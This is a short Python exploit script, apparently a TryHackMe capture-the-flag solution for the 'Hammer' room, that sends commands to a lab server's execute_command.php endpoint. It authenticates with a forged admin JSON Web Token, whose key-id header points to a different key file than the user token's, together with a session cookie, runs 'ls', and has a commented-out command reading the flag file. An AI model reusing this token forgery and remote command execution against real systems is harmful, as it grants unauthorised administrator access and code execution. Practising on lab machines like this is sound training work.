TryHackMe/CTF/Hammer/script.py

import requests

IP = '10.10.150.76'
url = f"http://{IP}:1337/execute_command.php"
session = "2t8g5kvcql31qk5iuvpgegkki7"
token_user = 'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiIsImtpZCI6Ii92YXIvd3d3L215a2V5LmtleSJ9.eyJpc3MiOiJodHRwOi8vaGFtbWVyLnRobSIsImF1ZCI6Imh0dHA6Ly9oYW1tZXIudGhtIiwiaWF0IjoxNzYxMjQ1MTA3LCJleHAiOjE3NjEyNDg3MDcsImRhdGEiOnsidXNlcl9pZCI6MSwiZW1haWwiOiJ0ZXN0ZXJAaGFtbWVyLnRobSIsInJvbGUiOiJ1c2VyIn19.9hrG4miaa7txtC0CaXt0UJsv0Cg4aSKmCD8m6CG9qts'
token_admin = 'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiIsImtpZCI6Ii92YXIvd3d3L2h0bWwvMTg4YWRlMS5rZXkifQ.eyJpc3MiOiJodHRwOi8vaGFtbWVyLnRobSIsImF1ZCI6Imh0dHA6Ly9oYW1tZXIudGhtIiwiaWF0IjoxNzYxMjQ1NjUwLCJleHAiOjE3NjEyNDkyNTAsImRhdGEiOnsidXNlcl9pZCI6MSwiZW1haWwiOiJ0ZXN0ZXJAaGFtbWVyLnRobSIsInJvbGUiOiJhZG1pbiJ9fQ.Hk_RgyXnBqyBYYzpkkJ-4KqclFfMNqLs41TxJOtRcGE'

headers = {
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0',
    'Accept': '*/*',
    'Accept-Language': 'en-US,en;q=0.5',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/json',
    'X-Requested-With': 'XMLHttpRequest',
    'Origin': f"http://{IP}:1337",
    'DNT': '1',
    'Sec-GPC': '1',
    'Connection': 'keep-alive',
    'Referer': f"http://{IP}:1337/dashboard.php",
    'Cookie': f"PHPSESSID={session}; token={token_admin}; persistentSession=no",
    'Priority': 'u=0',
    'Authorization': f"Bearer {token_admin}"
}

data = {
#    'command': 'cat /home/ubuntu/flag.txt'
    'command': 'ls'
}

print(headers)

response = requests.post(url, headers=headers, data=data)
print(response.json())